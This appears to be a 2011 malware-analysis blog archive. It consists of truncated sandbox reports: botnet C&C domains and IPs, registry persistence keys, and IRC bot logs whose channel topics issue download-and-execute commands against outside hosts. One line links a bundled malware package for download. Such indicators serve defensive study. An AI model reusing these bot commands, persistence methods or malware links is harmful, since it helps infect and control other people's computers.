Month: February 2011

dc.studyingcenter-org.com 123.183.217.32 dc.tvteam.info dc.babypin.net Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = c:RECYCLERR-1-5-21-1482476501-1644491937-682003330-1013winfixer.exe ReadsRead more...

DNS Lookup Host Name IP Address xeonbox.homeip.net 200.105.228.106 webcache.dyndns.info 127.0.0.1 bnet.doesntexist.org 200.105.228.106 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Outgoing connection to remote server: webcache.dyndns.info TCP port 8888 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Remote Host Port Number 174.132.221.20 80 200.105.228.106 8888 NICK usr331420 USER root 8 * : someRead more...

urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38 72.20.14.38:33333 Nick: {NOVA}[USA][XP-SP3]610119 Username: VirUs VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY Joined Channel: ##Turb0-XXX## PRIVMSG #d4 :Done.. PRIVMSG #d2 :Done.. Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe” Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.” Private Message to Channel ##Turb0-XXX##: “DownloadRead more...

m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199 212.252.34.199:6667 Nick: [AUS|XP|620207] Username: onfkyav Server Pass: m3rc Joined Channel: #m3rc with Password kxfcrt Channel Topic for Channel #m3rc: “.p2p” Private Message to Channel #m3rc: “[p2p]: Spreading to p2p folders.” Set by ccc on Tue Dec 28 08:36:24 Private Message to User [AUS|XP|620207]: “VERSION” Now talking in #2k38 Process Created: Topic isRead more...

Botnet C&C irc pantylost.mooo.com ip: 60.165.98.198 marinehh.twilightparadox.com ip: 60.165.98.198 stockingag.jumpingcrab.com ip: 60.165.98.198 pantylost.crabdance.com ip: 60.165.98.198 addr: onthebreak.UglyAs.com ip: 60.165.98.198 headmefc.AsSexyAs.com ip: 60.165.98.198 computercc.ignorelist.com ip: 60.165.98.198 sandtp.chickenkiller.com ip: 60.165.98.198 greenbarc.IsTheBe.st ip: 60.165.98.198 ringc.strangled.net ip: 60.165.98.198 60.165.98.198:8684 NICK [N00_USA_XP_39922187] USER SP2-917 * 0 :COMPUTERNAME Now talking in #blue3 Topic is ‘|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gifRead more...

Here another malware package around 52 mb inside u have multiple malwares Downaload: http://0b975bb5.tinylinks.co

DNS Lookup Host Name IP Address dq.javagames7.com 174.121.62.122 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunRead more...

Panel:Outgoing connection to remote server: 69.162.99.180 TCP port 8083 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Network” = rundll32.exe “C:Dokumente und EinstellungenAdministratorsys32config.dll”,network HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “DefaultConnectionSettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “SavedLegacySettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings “AutoConfigURL” = http://win32.z3nos.com:2011/set.pac Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionFontSubstitutes “MS Shell Dlg 2” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”Read more...

DNS Lookup Host Name IP Address master.easyanticheat.net 80.67.10.234 Outgoing connection to remote server: master.easyanticheat.net TCP port 50301 Outgoing connection to remote server: 82.203.212.9 TCP port 50301 Outgoing connection to remote server: 78.47.251.150 TCP port 50301 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced “EnableBalloonTips” = [REG_DWORD, value: 00000001] Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggleRead more...

DNS Lookup Host Name IP Address iphonefirmware.com 174.121.193.76 127.0.0.1 127.0.0.1 zonetf.com 96.9.169.85 onloneservermonitoring.com 64.191.90.101 www.google.com 209.85.149.106 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 55980 Outgoing connection to remote server: iphonefirmware.com TCP port 80 Outgoing connection to remote server: zonetf.com TCP port 80 Outgoing connection to remote server: onloneservermonitoring.com TCP port 80 Outgoing connection toRead more...